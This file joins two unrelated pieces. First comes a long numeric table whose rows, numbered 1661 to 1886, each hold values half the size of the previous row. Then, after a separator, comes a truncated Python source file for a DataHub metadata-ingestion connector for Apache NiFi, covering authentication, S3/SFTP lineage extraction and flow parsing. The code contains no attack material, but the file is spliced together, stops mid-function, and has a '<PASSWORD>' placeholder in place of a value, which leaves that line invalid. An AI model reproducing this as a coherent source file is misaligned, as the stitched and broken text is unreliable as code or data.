1661 9.51380847455985445856525238906098E-1001 4.75690423727992722928262619453049E-1001
1662 2.378452118639963614641313097265245E-1001 1.189226059319981807320656548632623E-1001
1663 5.946130296599909036603282743163115E-1002 2.973065148299954518301641371581558E-1002
1664 1.486532574149977259150820685790779E-1002 7.432662870749886295754103428953895E-1003
1665 3.716331435374943147877051714476948E-1003 1.858165717687471573938525857238474E-1003
1666 9.29082858843735786969262928619237E-1004 4.645414294218678934846314643096185E-1004
1667 2.322707147109339467423157321548093E-1004 1.161353573554669733711578660774046E-1004
1668 5.80676786777334866855789330387023E-1005 2.903383933886674334278946651935115E-1005
1669 1.451691966943337167139473325967558E-1005 7.258459834716685835697366629837788E-1006
1670 3.629229917358342917848683314918894E-1006 1.814614958679171458924341657459447E-1006
1671 9.073074793395857294621708287297235E-1007 4.536537396697928647310854143648618E-1007
1672 2.268268698348964323655427071824309E-1007 1.134134349174482161827713535912155E-1007
1673 5.670671745872410809138567679560775E-1008 2.835335872936205404569283839780388E-1008
1674 1.417667936468102702284641919890194E-1008 7.08833968234051351142320959945097E-1009
1675 3.544169841170256755711604799725485E-1009 1.772084920585128377855802399862743E-1009
1676 8.860424602925641889279011999313715E-1010 4.430212301462820944639505999656858E-1010
1677 2.215106150731410472319752999828429E-1010 1.107553075365705236159876499914215E-1010
1678 5.537765376828526180799382499571075E-1011 2.768882688414263090399691249785538E-1011
1679 1.384441344207131545199845624892769E-1011 6.922206721035657725999228124463845E-1012
1680 3.461103360517828862999614062231923E-1012 1.730551680258914431499807031115961E-1012
1681 8.652758401294572157499035155579805E-1013 4.326379200647286078749517577789903E-1013
1682 2.163189600323643039374758788894952E-1013 1.081594800161821519687379394447476E-1013
1683 5.40797400080910759843689697223738E-1014 2.70398700040455379921844848611869E-1014
1684 1.351993500202276899609224243059345E-1014 6.759967501011384498046121215296725E-1015
1685 3.379983750505692249023060607648363E-1015 1.689991875252846124511530303824181E-1015
1686 8.449959376264230622557651519120905E-1016 4.224979688132115311278825759560453E-1016
1687 2.112489844066057655639412879780227E-1016 1.056244922033028827819706439890113E-1016
1688 5.281224610165144139098532199450565E-1017 2.640612305082572069549266099725283E-1017
1689 1.320306152541286034774633049862642E-1017 6.601530762706430173873165249313208E-1018
1690 3.300765381353215086936582624656604E-1018 1.650382690676607543468291312328302E-1018
1691 8.25191345338303771734145656164151E-1019 4.125956726691518858670728280820755E-1019
1692 2.062978363345759429335364140410378E-1019 1.031489181672879714667682070205189E-1019
1693 5.157445908364398573338410351025945E-1020 2.578722954182199286669205175512973E-1020
1694 1.289361477091099643334602587756487E-1020 6.446807385455498216673012938782433E-1021
1695 3.223403692727749108336506469391217E-1021 1.611701846363874554168253234695608E-1021
1696 8.05850923181937277084126617347804E-1022 4.02925461590968638542063308673902E-1022
1697 2.01462730795484319271031654336951E-1022 1.007313653977421596355158271684755E-1022
1698 5.036568269887107981775791358423775E-1023 2.518284134943553990887895679211888E-1023
1699 1.259142067471776995443947839605944E-1023 6.29571033735888497721973919802972E-1024
1700 3.14785516867944248860986959901486E-1024 1.57392758433972124430493479950743E-1024
1701 7.86963792169860622152467399753715E-1025 3.934818960849303110762336998768575E-1025
1702 1.967409480424651555381168499384288E-1025 9.837047402123257776905842496921438E-1026
1703 4.918523701061628888452921248460719E-1026 2.459261850530814444226460624230360E-1026
1704 1.229630925265407222113230312115180E-1026 6.14815462632703611056615156057590E-1027
1705 3.07407731316351805528307578028795E-1027 1.537038656581759027641537890143975E-1027
1706 7.685193282908795138207689450719875E-1028 3.842596641454397569103844725359938E-1028
1707 1.921298320727198784551922362679969E-1028 9.606491603635993922759611813399845E-1029
1708 4.803245801817996961379805906699923E-1029 2.401622900908998480689902953349961E-1029
1709 1.200811450454499240344951476674981E-1029 6.004057252272496201724757383374903E-1030
1710 3.002028626136248100862378691687452E-1030 1.501014313068124050431189345843726E-1030
1711 7.50507156534062025215594672921863E-1031 3.752535782670310126077973364609315E-1031
1712 1.876267891335155063038986682304658E-1031 9.381339456675775315194933411523288E-1032
1713 4.690669728337887657597466705761644E-1032 2.345334864168943828798733352880822E-1032
1714 1.172667432084471914399366676440411E-1032 5.863337160422359571996833382202055E-1033
1715 2.931668580211179785998416691101028E-1033 1.465834290105589892999208345550514E-1033
1716 7.32917145052794946499604172775257E-1034 3.664585725263974732498020863876285E-1034
1717 1.832292862631987366249010431938143E-1034 9.161464313159936831245052159690713E-1035
1718 4.580732156579968415622526079845357E-1035 2.290366078289984207811263039922678E-1035
1719 1.145183039144992103905631519961339E-1035 5.725915195724960519528157599806695E-1036
1720 2.862957597862480259764078799903348E-1036 1.431478798931240129882039399951674E-1036
1721 7.15739399465620064941019699975837E-1037 3.578696997328100324705098499879185E-1037
1722 1.789348498664050162352549249939593E-1037 8.946742493320250811762746249697963E-1038
1723 4.473371246660125405881373124848982E-1038 2.236685623330062702940686562424491E-1038
1724 1.118342811665031351470343281212246E-1038 5.591714058325156757351716406061228E-1039
1725 2.795857029162578378675858203030614E-1039 1.397928514581289189337929101515307E-1039
1726 6.989642572906445946689645507576535E-1040 3.494821286453222973344822753788268E-1040
1727 1.747410643226611486672411376894134E-1040 8.73705321613305743336205688447067E-1041
1728 4.368526608066528716681028442235335E-1041 2.184263304033264358340514221117668E-1041
1729 1.092131652016632179170257110558834E-1041 5.46065826008316089585128555279417E-1042
1730 2.730329130041580447925642776397085E-1042 1.365164565020790223962821388198543E-1042
1731 6.825822825103951119814106940992715E-1043 3.412911412551975559907053470496358E-1043
1732 1.706455706275987779953526735248179E-1043 8.532278531379938899767633676240895E-1044
1733 4.266139265689969449883816838120448E-1044 2.133069632844984724941908419060224E-1044
1734 1.066534816422492362470954209530112E-1044 5.33267408211246181235477104765056E-1045
1735 2.66633704105623090617738552382528E-1045 1.33316852052811545308869276191264E-1045
1736 6.6658426026405772654434638095632E-1046 3.3329213013202886327217319047816E-1046
1737 1.6664606506601443163608659523908E-1046 8.332303253300721581804329761954E-1047
1738 4.166151626650360790902164880977E-1047 2.0830758133251803954510824404885E-1047
1739 1.04153790666259019772554122024425E-1047 5.20768953331295098862770610122125E-1048
1740 2.603844766656475494313853050610625E-1048 1.301922383328237747156926525305313E-1048
1741 6.509611916641188735784632626526565E-1049 3.254805958320594367892316313263283E-1049
1742 1.627402979160297183946158156631642E-1049 8.137014895801485919730790783158208E-1050
1743 4.068507447900742959865395391579104E-1050 2.034253723950371479932697695789552E-1050
1744 1.017126861975185739966348847894776E-1050 5.08563430987592869983174423947388E-1051
1745 2.54281715493796434991587211973694E-1051 1.27140857746898217495793605986847E-1051
1746 6.35704288734491087478968029934235E-1052 3.178521443672455437394840149671175E-1052
1747 1.589260721836227718697420074835588E-1052 7.946303609181138593487100374177938E-1053
1748 3.973151804590569296743550187088969E-1053 1.986575902295284648371775093544485E-1053
1749 9.932879511476423241858875467722425E-1054 4.966439755738211620929437733861213E-1054
1750 2.483219877869105810464718866930607E-1054 1.241609938934552905232359433465303E-1054
1751 6.208049694672764526161797167326515E-1055 3.104024847336382263080898583663258E-1055
1752 1.552012423668191131540449291831629E-1055 7.760062118340955657702246459158145E-1056
1753 3.880031059170477828851123229579073E-1056 1.940015529585238914425561614789536E-1056
1754 9.70007764792619457212780807394768E-1057 4.85003882396309728606390403697384E-1057
1755 2.42501941198154864303195201848692E-1057 1.21250970599077432151597600924346E-1057
1756 6.0625485299538716075798800462173E-1058 3.03127426497693580378994002310865E-1058
1757 1.515637132488467901894970011554325E-1058 7.578185662442339509474850057771625E-1059
1758 3.789092831221169754737425028885813E-1059 1.894546415610584877368712514442906E-1059
1759 9.47273207805292438684356257221453E-1060 4.736366039026462193421781286107265E-1060
1760 2.368183019513231096710890643053633E-1060 1.184091509756615548355445321526816E-1060
1761 5.92045754878307774177722660763408E-1061 2.96022877439153887088861330381704E-1061
1762 1.48011438719576943544430665190852E-1061 7.4005719359788471772215332595426E-1062
1763 3.7002859679894235886107666297713E-1062 1.85014298399471179430538331488565E-1062
1764 9.25071491997355897152691657442825E-1063 4.625357459986779485763458287214125E-1063
1765 2.312678729993389742881729143607063E-1063 1.156339364996694871440864571803531E-1063
1766 5.781696824983474357204322859017655E-1064 2.890848412491737178602161429508828E-1064
1767 1.445424206245868589301080714754414E-1064 7.22712103122934294650540357377207E-1065
1768 3.613560515614671473252701786886035E-1065 1.806780257807335736626350893443018E-1065
1769 9.03390128903667868313175446721509E-1066 4.516950644518339341565877233607545E-1066
1770 2.258475322259169670782938616803773E-1066 1.129237661129584835391469308401886E-1066
1771 5.64618830564792417695734654200943E-1067 2.823094152823962088478673271004715E-1067
1772 1.411547076411981044239336635502358E-1067 7.057735382059905221196683177511788E-1068
1773 3.528867691029952610598341588755894E-1068 1.764433845514976305299170794377947E-1068
1774 8.822169227574881526495853971889735E-1069 4.411084613787440763247926985944868E-1069
1775 2.205542306893720381623963492972434E-1069 1.102771153446860190811981746486217E-1069
1776 5.513855767234300954059908732431085E-1070 2.756927883617150477029954366215543E-1070
1777 1.378463941808575238514977183107772E-1070 6.892319709042876192574885915538858E-1071
1778 3.446159854521438096287442957769429E-1071 1.723079927260719048143721478884715E-1071
1779 8.615399636303595240718607394423575E-1072 4.307699818151797620359303697211788E-1072
1780 2.153849909075898810179651848605894E-1072 1.076924954537949405089825924302947E-1072
1781 5.384624772689747025449129621514735E-1073 2.692312386344873512724564810757368E-1073
1782 1.346156193172436756362282405378684E-1073 6.73078096586218378181141202689342E-1074
1783 3.36539048293109189090570601344671E-1074 1.682695241465545945452853006723355E-1074
1784 8.413476207327729727264265033616775E-1075 4.206738103663864863632132516808388E-1075
1785 2.103369051831932431816066258404194E-1075 1.051684525915966215908033129202097E-1075
1786 5.258422629579831079540165646010485E-1076 2.629211314789915539770082823005243E-1076
1787 1.314605657394957769885041411502622E-1076 6.573028286974788849425207057513108E-1077
1788 3.286514143487394424712603528756554E-1077 1.643257071743697212356301764378277E-1077
1789 8.216285358718486061781508821891385E-1078 4.108142679359243030890754410945693E-1078
1790 2.054071339679621515445377205472847E-1078 1.027035669839810757722688602736423E-1078
1791 5.135178349199053788613443013682115E-1079 2.567589174599526894306721506841058E-1079
1792 1.283794587299763447153360753420529E-1079 6.418972936498817235766803767102645E-1080
1793 3.209486468249408617883401883551323E-1080 1.604743234124704308941700941775661E-1080
1794 8.023716170623521544708504708878305E-1081 4.011858085311760772354252354439153E-1081
1795 2.005929042655880386177126177219577E-1081 1.002964521327940193088563088609788E-1081
1796 5.01482260663970096544281544304894E-1082 2.50741130331985048272140772152447E-1082
1797 1.253705651659925241360703860762235E-1082 6.268528258299626206803519303811175E-1083
1798 3.134264129149813103401759651905588E-1083 1.567132064574906551700879825952794E-1083
1799 7.83566032287453275850439912976397E-1084 3.917830161437266379252199564881985E-1084
1800 1.958915080718633189626099782440993E-1084 9.794575403593165948130498912204963E-1085
1801 4.897287701796582974065249456102482E-1085 2.448643850898291487032624728051241E-1085
1802 1.224321925449145743516312364025621E-1085 6.121609627245728717581561820128103E-1086
1803 3.060804813622864358790780910064052E-1086 1.530402406811432179395390455032026E-1086
1804 7.65201203405716089697695227516013E-1087 3.826006017028580448488476137580065E-1087
1805 1.913003008514290224244238068790033E-1087 9.565015042571451121221190343950163E-1088
1806 4.782507521285725560610595171975082E-1088 2.391253760642862780305297585987541E-1088
1807 1.195626880321431390152648792993771E-1088 5.978134401607156950763243964968853E-1089
1808 2.989067200803578475381621982484427E-1089 1.494533600401789237690810991242213E-1089
1809 7.472668002008946188454054956211065E-1090 3.736334001004473094227027478105533E-1090
1810 1.868167000502236547113513739052767E-1090 9.340835002511182735567568695263833E-1091
1811 4.670417501255591367783784347631917E-1091 2.335208750627795683891892173815958E-1091
1812 1.167604375313897841945946086907979E-1091 5.838021876569489209729730434539895E-1092
1813 2.919010938284744604864865217269948E-1092 1.459505469142372302432432608634974E-1092
1814 7.29752734571186151216216304317487E-1093 3.648763672855930756081081521587435E-1093
1815 1.824381836427965378040540760793718E-1093 9.121909182139826890202703803968588E-1094
1816 4.560954591069913445101351901984294E-1094 2.280477295534956722550675950992147E-1094
1817 1.140238647767478361275337975496074E-1094 5.701193238837391806376689877480368E-1095
1818 2.850596619418695903188344938740184E-1095 1.425298309709347951594172469370092E-1095
1819 7.12649154854673975797086234685046E-1096 3.56324577427336987898543117342523E-1096
1820 1.781622887136684939492715586712615E-1096 8.908114435683424697463577933563075E-1097
1821 4.454057217841712348731788966781538E-1097 2.227028608920856174365894483390769E-1097
1822 1.113514304460428087182947241695385E-1097 5.567571522302140435914736208476923E-1098
1823 2.783785761151070217957368104238462E-1098 1.391892880575535108978684052119231E-1098
1824 6.959464402877675544893420260596155E-1099 3.479732201438837772446710130298078E-1099
1825 1.739866100719418886223355065149039E-1099 8.699330503597094431116775325745195E-1100
1826 4.349665251798547215558387662872598E-1100 2.174832625899273607779193831436299E-1100
1827 1.087416312949636803889596915718150E-1100 5.437081564748184019447984578590748E-1101
1828 2.718540782374092009723992289295374E-1101 1.359270391187046004861996144647687E-1101
1829 6.796351955935230024309980723238435E-1102 3.398175977967615012154990361619218E-1102
1830 1.699087988983807506077495180809609E-1102 8.495439944919037530387475904048045E-1103
1831 4.247719972459518765193737952024023E-1103 2.123859986229759382596868976012011E-1103
1832 1.061929993114879691298434488006006E-1103 5.309649965574398456492172440030028E-1104
1833 2.654824982787199228246086220015014E-1104 1.327412491393599614123043110007507E-1104
1834 6.637062456967998070615215550037535E-1105 3.318531228483999035307607775018768E-1105
1835 1.659265614241999517653803887509384E-1105 8.29632807120999758826901943754692E-1106
1836 4.14816403560499879413450971877346E-1106 2.07408201780249939706725485938673E-1106
1837 1.037041008901249698533627429693365E-1106 5.185205044506248492668137148466825E-1107
1838 2.592602522253124246334068574233413E-1107 1.296301261126562123167034287116706E-1107
1839 6.48150630563281061583517143558353E-1108 3.240753152816405307917585717791765E-1108
1840 1.620376576408202653958792858895883E-1108 8.101882882041013269793964294479413E-1109
1841 4.050941441020506634896982147239707E-1109 2.025470720510253317448491073619853E-1109
1842 1.012735360255126658724245536809927E-1109 5.063676801275633293621227684049633E-1110
1843 2.531838400637816646810613842024817E-1110 1.265919200318908323405306921012408E-1110
1844 6.32959600159454161702653460506204E-1111 3.16479800079727080851326730253102E-1111
1845 1.58239900039863540425663365126551E-1111 7.91199500199317702128316825632755E-1112
1846 3.955997500996588510641584128163775E-1112 1.977998750498294255320792064081888E-1112
1847 9.88999375249147127660396032040944E-1113 4.94499687624573563830198016020472E-1113
1848 2.47249843812286781915099008010236E-1113 1.23624921906143390957549504005118E-1113
1849 6.1812460953071695478774752002559E-1114 3.09062304765358477393873760012795E-1114
1850 1.545311523826792386969368800063975E-1114 7.726557619133961934846844000319875E-1115
1851 3.863278809566980967423422000159938E-1115 1.931639404783490483711711000079969E-1115
1852 9.658197023917452418558555000399845E-1116 4.829098511958726209279277500199923E-1116
1853 2.414549255979363104639638750099962E-1116 1.207274627989681552319819375049981E-1116
1854 6.036373139948407761599096875249905E-1117 3.018186569974203880799548437624953E-1117
1855 1.509093284987101940399774218812477E-1117 7.545466424935509701998871094062383E-1118
1856 3.772733212467754850999435547031192E-1118 1.886366606233877425499717773515596E-1118
1857 9.43183303116938712749858886757798E-1119 4.71591651558469356374929443378899E-1119
1858 2.357958257792346781874647216894495E-1119 1.178979128896173390937323608447248E-1119
1859 5.89489564448086695468661804223624E-1120 2.94744782224043347734330902111812E-1120
1860 1.47372391112021673867165451055906E-1120 7.3686195556010836933582725527953E-1121
1861 3.68430977780054184667913627639765E-1121 1.842154888900270923339568138198825E-1121
1862 9.210774444501354616697840690994125E-1122 4.605387222250677308348920345497063E-1122
1863 2.302693611125338654174460172748532E-1122 1.151346805562669327087230086374266E-1122
1864 5.75673402781334663543615043187133E-1123 2.878367013906673317718075215935665E-1123
1865 1.439183506953336658859037607967833E-1123 7.195917534766683294295188039839163E-1124
1866 3.597958767383341647147594019919582E-1124 1.798979383691670823573797009959791E-1124
1867 8.994896918458354117868985049798955E-1125 4.497448459229177058934492524899478E-1125
1868 2.248724229614588529467246262449739E-1125 1.124362114807294264733623131224870E-1125
1869 5.62181057403647132366811565612435E-1126 2.810905287018235661834057828062175E-1126
1870 1.405452643509117830917028914031088E-1126 7.027263217545589154585144570155438E-1127
1871 3.513631608772794577292572285077719E-1127 1.756815804386397288646286142538860E-1127
1872 8.78407902193198644323143071269430E-1128 4.39203951096599322161571535634715E-1128
1873 2.196019755482996610807857678173575E-1128 1.098009877741498305403928839086788E-1128
1874 5.49004938870749152701964419543394E-1129 2.74502469435374576350982209771697E-1129
1875 1.372512347176872881754911048858485E-1129 6.862561735884364408774555244292425E-1130
1876 3.431280867942182204387277622146213E-1130 1.715640433971091102193638811073106E-1130
1877 8.57820216985545551096819405536553E-1131 4.289101084927727755484097027682765E-1131
1878 2.144550542463863877742048513841383E-1131 1.072275271231931938871024256920691E-1131
1879 5.361376356159659694355121284603455E-1132 2.680688178079829847177560642301728E-1132
1880 1.340344089039914923588780321150864E-1132 6.70172044519957461794390160575432E-1133
1881 3.35086022259978730897195080287716E-1133 1.67543011129989365448597540143858E-1133
1882 8.3771505564994682724298770071929E-1134 4.18857527824973413621493850359645E-1134
1883 2.094287639124867068107469251798225E-1134 1.047143819562433534053734625899113E-1134
1884 5.235719097812167670268673129495565E-1135 2.617859548906083835134336564747783E-1135
1885 1.308929774453041917567168282373892E-1135 6.544648872265209587835841411869458E-1136
1886 3.272324436132604793917920705934729E-1136 1.636162218066302396958960352967365E-1136
| |
<gh_stars>1-10
import json
import logging
import ssl
import time
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from enum import Enum
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from urllib.parse import urljoin
import requests
from dateutil import parser
from packaging import version
from requests.adapters import HTTPAdapter
import datahub.emitter.mce_builder as builder
from datahub.configuration.common import AllowDenyPattern, ConfigModel
from datahub.emitter.mcp import MetadataChangeProposalWrapper
from datahub.ingestion.api.common import PipelineContext
from datahub.ingestion.api.source import Source, SourceReport
from datahub.ingestion.api.workunit import MetadataWorkUnit
from datahub.metadata.schema_classes import (
ChangeTypeClass,
DataFlowInfoClass,
DataJobInfoClass,
DataJobInputOutputClass,
DataPlatformInstanceClass,
DatasetPropertiesClass,
)
logger = logging.getLogger(__name__)
NIFI = "nifi"
# Python requests does not support passing password for key file,
# The same can be achieved by mounting ssl context
# as described here - https://github.com/psf/requests/issues/2519
# and here - https://github.com/psf/requests/issues/1573
class SSLAdapter(HTTPAdapter):
def __init__(self, certfile, keyfile, password=None):
self.context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.context.load_cert_chain(
certfile=certfile, keyfile=keyfile, password=password
)
super().__init__()
def init_poolmanager(self, *args, **kwargs):
kwargs["ssl_context"] = self.context
return super().init_poolmanager(*args, **kwargs)
class NifiAuthType(Enum):
NO_AUTH = "NO_AUTH"
SINGLE_USER = "SINGLE_USER"
CLIENT_CERT = "CLIENT_CERT"
class NifiSourceConfig(ConfigModel):
site_url: str
auth: NifiAuthType = NifiAuthType.NO_AUTH
provenance_days: int = 7 # Fetch provenance events for past 1 week
process_group_pattern: AllowDenyPattern = AllowDenyPattern.allow_all()
# Required for nifi deployments using Remote Process Groups
site_name: str = "default"
site_url_to_site_name: Dict[str, str] = {}
# Required to be set if auth is of type SINGLE_USER
username: Optional[str]
password: Optional[str]
# Required to be set if auth is of type CLIENT_CERT
client_cert_file: Optional[str]
client_key_file: Optional[str]
client_key_password: Optional[str]
# Required to be set if nifi server certificate is not signed by
# root CA trusted by client system, e.g. self-signed certificates
ca_file: Optional[str]
env: str = builder.DEFAULT_ENV
TOKEN_ENDPOINT = "/nifi-api/access/token"
ABOUT_ENDPOINT = "/nifi-api/flow/about"
CLUSTER_ENDPOINT = "/nifi-api/flow/cluster/summary"
PG_ENDPOINT = "/nifi-api/flow/process-groups/"
PROVENANCE_ENDPOINT = "/nifi-api/provenance/"
class NifiType(Enum):
PROCESSOR = "PROCESSOR"
FUNNEL = "FUNNEL"
INPUT_PORT = "INPUT_PORT"
OUTPUT_PORT = "OUTPUT_PORT"
REMOTE_INPUT_PORT = "REMOTE_INPUT_PORT"
REMOTE_OUTPUT_PORT = "REMOTE_OUTPUT_PORT"
class NifiEventType:
CREATE = "CREATE"
FETCH = "FETCH"
SEND = "SEND"
RECEIVE = "RECEIVE"
class NifiProcessorType:
ListS3 = "org.apache.nifi.processors.aws.s3.ListS3"
FetchS3Object = "org.apache.nifi.processors.aws.s3.FetchS3Object"
PutS3Object = "org.apache.nifi.processors.aws.s3.PutS3Object"
ListSFTP = "org.apache.nifi.processors.standard.ListSFTP"
FetchSFTP = "org.apache.nifi.processors.standard.FetchSFTP"
GetSFTP = "org.apache.nifi.processors.standard.GetSFTP"
PutSFTP = "org.apache.nifi.processors.standard.PutSFTP"
# To support new processor type,
# 1. add an entry in KNOWN_INGRESS_EGRESS_PROCESORS
# 2. Implement provenance event analyzer to find external dataset and
# map it in provenance_event_to_lineage_map
class NifiProcessorProvenanceEventAnalyzer:
env: str
KNOWN_INGRESS_EGRESS_PROCESORS = {
NifiProcessorType.ListS3: NifiEventType.CREATE,
NifiProcessorType.FetchS3Object: NifiEventType.FETCH,
NifiProcessorType.PutS3Object: NifiEventType.SEND,
NifiProcessorType.ListSFTP: NifiEventType.CREATE,
NifiProcessorType.FetchSFTP: NifiEventType.FETCH,
NifiProcessorType.GetSFTP: NifiEventType.RECEIVE,
NifiProcessorType.PutSFTP: NifiEventType.SEND,
}
def __init__(self) -> None:
# Map of Nifi processor type to the provenance event analyzer to find lineage
self.provenance_event_to_lineage_map: Dict[
str, Callable[[Dict], ExternalDataset]
] = {
NifiProcessorType.ListS3: self.process_s3_provenance_event,
NifiProcessorType.FetchS3Object: self.process_s3_provenance_event,
NifiProcessorType.PutS3Object: self.process_s3_provenance_event,
NifiProcessorType.ListSFTP: self.process_sftp_provenance_event,
NifiProcessorType.FetchSFTP: self.process_sftp_provenance_event,
NifiProcessorType.GetSFTP: self.process_sftp_provenance_event,
NifiProcessorType.PutSFTP: self.process_sftp_provenance_event,
}
def process_s3_provenance_event(self, event):
attributes = event.get("attributes", [])
s3_bucket = get_attribute_value(attributes, "s3.bucket")
s3_key = get_attribute_value(attributes, "s3.key")
if not s3_key:
s3_key = get_attribute_value(attributes, "filename")
s3_url = f"s3://{s3_bucket}/{s3_key}"
s3_url = s3_url[: s3_url.rindex("/")]
dataset_name = s3_url.replace("s3://", "").replace("/", ".")
platform = "urn:li:dataPlatform:s3"
dataset_urn = builder.make_dataset_urn(platform, dataset_name, self.env)
return ExternalDataset(
platform,
dataset_name,
dict(s3_uri=s3_url),
dataset_urn,
)
def process_sftp_provenance_event(self, event):
attributes = event.get("attributes", [])
remote_host = get_attribute_value(attributes, "sftp.remote.host")
path = get_attribute_value(attributes, "path")
filename = get_attribute_value(attributes, "filename")
absolute_path = f"sftp://{remote_host}/{path}/{filename}"
if remote_host is None or path is None or filename is None:
absolute_path = event.get("transitUri")
absolute_path = absolute_path.replace("/./", "/")
if absolute_path.endswith("/."):
absolute_path = absolute_path[:-2]
absolute_path = absolute_path[: absolute_path.rindex("/")]
dataset_name = absolute_path.replace("sftp://", "").replace("/", ".")
platform = "file"
dataset_urn = builder.make_dataset_urn(platform, dataset_name, self.env)
return ExternalDataset(
platform,
dataset_name,
dict(uri=absolute_path),
dataset_urn,
)
@dataclass
class ExternalDataset:
platform: str
dataset_name: str
dataset_properties: Dict[str, str]
dataset_urn: str
@dataclass
class NifiComponent:
id: str
name: str
type: str
parent_group_id: str
nifi_type: NifiType
comments: Optional[str] = None
status: Optional[str] = None
# present only for nifi remote ports and processors
inlets: Dict[str, ExternalDataset] = field(default_factory=dict)
outlets: Dict[str, ExternalDataset] = field(default_factory=dict)
# present only for processors
config: Optional[Dict] = None
# present only for nifi remote ports
target_uris: Optional[str] = None
parent_rpg_id: Optional[str] = None
# Last successful event time
last_event_time: Optional[str] = None
@dataclass
class NifiProcessGroup:
id: str
name: str
parent_group_id: Optional[str]
@dataclass
class NifiRemoteProcessGroup:
id: str
name: str
parent_group_id: str
remote_ports: Dict[str, NifiComponent]
@dataclass
class NifiFlow:
version: Optional[str]
clustered: Optional[bool]
root_process_group: NifiProcessGroup
components: Dict[str, NifiComponent] = field(default_factory=dict)
remotely_accessible_ports: Dict[str, NifiComponent] = field(default_factory=dict)
connections: List[Tuple[str, str]] = field(default_factory=list)
processGroups: Dict[str, NifiProcessGroup] = field(default_factory=dict)
remoteProcessGroups: Dict[str, NifiRemoteProcessGroup] = field(default_factory=dict)
remote_ports: Dict[str, NifiComponent] = field(default_factory=dict)
def get_attribute_value(attr_lst: List[dict], attr_name: str) -> Optional[str]:
match = [entry for entry in attr_lst if entry["name"] == attr_name]
if len(match) > 0:
return match[0]["value"]
return None
@dataclass
class NifiSourceReport(SourceReport):
filtered: List[str] = field(default_factory=list)
def report_dropped(self, ent_name: str) -> None:
self.filtered.append(ent_name)
# allowRemoteAccess
class NifiSource(Source):
config: NifiSourceConfig
report: NifiSourceReport
def __init__(self, config: NifiSourceConfig, ctx: PipelineContext) -> None:
super().__init__(ctx)
self.config = config
self.report = NifiSourceReport()
self.session = requests.Session()
if self.config.ca_file is not None:
self.session.verify = self.config.ca_file
if self.config.site_url_to_site_name is None:
self.config.site_url_to_site_name = {}
if (
not urljoin(self.config.site_url, "/nifi/")
in self.config.site_url_to_site_name
):
self.config.site_url_to_site_name[
urljoin(self.config.site_url, "/nifi/")
] = self.config.site_name
if self.config.auth is NifiAuthType.CLIENT_CERT:
logger.debug("Setting client certificates in requests ssl context")
assert (
self.config.client_cert_file is not None
), "Config client_cert_file is required for CLIENT_CERT auth"
self.session.mount(
urljoin(self.config.site_url, "/nifi-api/"),
SSLAdapter(
certfile=self.config.client_cert_file,
keyfile=self.config.client_key_file,
password=self.config.client_key_password,
),
)
if self.config.auth is NifiAuthType.SINGLE_USER:
assert (
self.config.username is not None
), "Config username is required for SINGLE_USER auth"
assert (
self.config.password is not None
), "Config password is required for SINGLE_USER auth"
token_response = self.session.post(
url=urljoin(self.config.site_url, TOKEN_ENDPOINT),
data={
"username": self.config.username,
"password": <PASSWORD>,
},
)
if not token_response.ok:
logger.error("Failed to get token")
self.report.report_failure(self.config.site_url, "Failed to get token")
self.session.headers.update(
{
"Authorization": "Bearer " + token_response.text,
# "Accept": "application/json",
"Content-Type": "application/json",
}
)
else:
self.session.headers.update(
{
# "Accept": "application/json",
"Content-Type": "application/json",
}
)
@classmethod
def create(cls, config_dict: dict, ctx: PipelineContext) -> "Source":
config = NifiSourceConfig.parse_obj(config_dict)
return cls(config, ctx)
def get_report(self) -> SourceReport:
return self.report
def update_flow(self, pg_flow_dto: Dict) -> None: # noqa: C901
breadcrumb_dto = pg_flow_dto.get("breadcrumb", {}).get("breadcrumb", {})
nifi_pg = NifiProcessGroup(
breadcrumb_dto.get("id"),
breadcrumb_dto.get("name"),
pg_flow_dto.get("parentGroupId"),
)
self.nifi_flow.processGroups[nifi_pg.id] = nifi_pg
if not self.config.process_group_pattern.allowed(nifi_pg.name):
self.report.report_dropped(f"{nifi_pg.name}.*")
return
flow_dto = pg_flow_dto.get("flow", {})
for processor in flow_dto.get("processors", []):
component = processor.get("component")
self.nifi_flow.components[component.get("id")] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
component.get("parentGroupId"),
NifiType.PROCESSOR,
config=component.get("config"),
comments=component.get("config", {}).get("comments"),
status=component.get("status", {}).get("runStatus"),
)
for funnel in flow_dto.get("funnels", []):
component = funnel.get("component")
self.nifi_flow.components[component.get("id")] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
component.get("parentGroupId"),
NifiType.FUNNEL,
comments=component.get("comments"),
status=component.get("status", {}).get("runStatus"),
)
logger.debug(f"Adding funnel {component.get('id')}")
for connection in flow_dto.get("connections", []):
# Exclude self - recursive relationships
if connection.get("sourceId") != connection.get("destinationId"):
self.nifi_flow.connections.append(
(connection.get("sourceId"), connection.get("destinationId"))
)
for inputPort in flow_dto.get("inputPorts", []):
component = inputPort.get("component")
if inputPort.get("allowRemoteAccess"):
self.nifi_flow.remotely_accessible_ports[
component.get("id")
] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
component.get("parentGroupId"),
NifiType.INPUT_PORT,
comments=component.get("comments"),
status=component.get("status", {}).get("runStatus"),
)
logger.debug(f"Adding remotely accessible port {component.get('id')}")
else:
self.nifi_flow.components[component.get("id")] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
component.get("parentGroupId"),
NifiType.INPUT_PORT,
comments=component.get("comments"),
status=component.get("status", {}).get("runStatus"),
)
logger.debug(f"Adding port {component.get('id')}")
for outputPort in flow_dto.get("outputPorts", []):
component = outputPort.get("component")
if outputPort.get("allowRemoteAccess"):
self.nifi_flow.remotely_accessible_ports[
component.get("id")
] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
component.get("parentGroupId"),
NifiType.OUTPUT_PORT,
comments=component.get("comments"),
status=component.get("status", {}).get("runStatus"),
)
logger.debug(f"Adding remotely accessible port {component.get('id')}")
else:
self.nifi_flow.components[component.get("id")] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
component.get("parentGroupId"),
NifiType.OUTPUT_PORT,
comments=component.get("comments"),
status=component.get("status", {}).get("runStatus"),
)
logger.debug(f"Adding report port {component.get('id')}")
for rpg in flow_dto.get("remoteProcessGroups", []):
rpg_component = rpg.get("component", {})
remote_ports = {}
contents = rpg_component.get("contents", {})
for component in contents.get("outputPorts", []):
if component.get("connected", False):
remote_ports[component.get("id")] = NifiComponent(
component.get("id"),
component.get("name"),
component.get("type"),
rpg_component.get("parentGroupId"),
